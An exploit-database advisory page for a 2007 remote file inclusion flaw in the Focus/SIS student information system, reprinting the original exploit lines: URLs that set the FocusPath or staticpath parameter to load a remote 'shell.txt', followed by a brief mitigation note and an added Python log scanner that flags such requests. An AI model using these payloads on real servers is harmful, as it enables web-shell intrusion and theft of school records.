Vendor: Focus/SIS
By: ThE TiGeR
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: Focus/SIS
Affected Version From: 1
Affected Version To: 2.2
Patch Exists: NO
Related CWE:
CPE: a:focus-sis
Metasploit:
Other Scripts:
Platforms Tested:
2007

Focus/SIS Remote File Inclusion

This exploit allows an attacker to include arbitrary files from a remote server in the Focus/SIS application. The vulnerability exists in versions 1.0 and 2.2 of the application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Focus/SIS or apply the necessary security fixes provided by the vendor.
Source

Exploit-DB raw data:

#Focus/SIS =>1.0&2.2 Remote file inclusion

#Download v1.0 : http://unix.freshmeat.net/redir/focus_sis/64492/url_zip/Focus_v1.0.zip

#         v2.2 : http://www.focus-sis.org/download.php?modfunc=file&version=2.2
============================================================================================================
#Exploit V1.0 :

#http://victime.com/Focus_v1.0_path/modules/Discipline/CategoryBreakdownTime.php?FocusPath= shell.txt?
============================================================================================================
#Exploit v 2.2 :

#http://victime.com/Focus_v2.2_path/modules/Discipline/CategoryBreakdownTime.php?staticpath= shell.txt?

#http://victime.com/Focus_v2.2_path/modules/Discipline/StudentFieldBreakdown.php?staticpath=shell.txt?

#Greetz & Thx : Str0ke

#Discovered by ThE TiGeR 

# milw0rm.com [2007-09-08]
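
A defender can look for requests that set the two parameters named above (`FocusPath`, `staticpath`) in web-server access logs. The following is an added example, not part of the original advisory or of Focus/SIS: it assumes Common/Combined Log Format, goes slightly beyond the two listed scripts by checking any `.php` request, and uses constructed log lines and hosts.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory data on this page.
SUSPECT_PARAMS = {"FocusPath", "staticpath"}
# Assumption: a value counts as "remote" if it starts with a URL scheme, "data:" or "//".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)", re.IGNORECASE)
# Request line inside a Common/Combined Log Format entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation IPs, .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Sep/2007:10:00:01 +0000] "GET /focus/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Sep/2007:10:02:13 +0000] "GET /focus/modules/Discipline/'
    'CategoryBreakdownTime.php?staticpath=http://host.example.invalid/a.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [08/Sep/2007:10:02:20 +0000] "GET /focus/modules/Discipline/'
    'StudentFieldBreakdown.php?%73taticpath=http%3A%2F%2Fhost.example.invalid%2Fa.txt HTTP/1.0" 200 300',
    '192.0.2.77 - - [08/Sep/2007:10:05:00 +0000] "GET /focus/modules/Discipline/'
    'CategoryBreakdownTime.php?FocusPath=../ HTTP/1.1" 500 0',
]

def classify(line):
    """Return (severity, param, value) for one log line, or None if nothing matches."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith(".php"):
        return None
    # parse_qsl percent-decodes names and values, so encoded parameter names still match.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in SUSPECT_PARAMS:
            severity = "high" if REMOTE_VALUE.match(value) else "review"
            return (severity, name, value)
    return None

def scan(lines):
    """Return [(line_number, severity, param)] for every flagged entry."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hit = classify(line)
        if hit:
            findings.append((number, hit[0], hit[1]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the request line, so this check does not see request bodies.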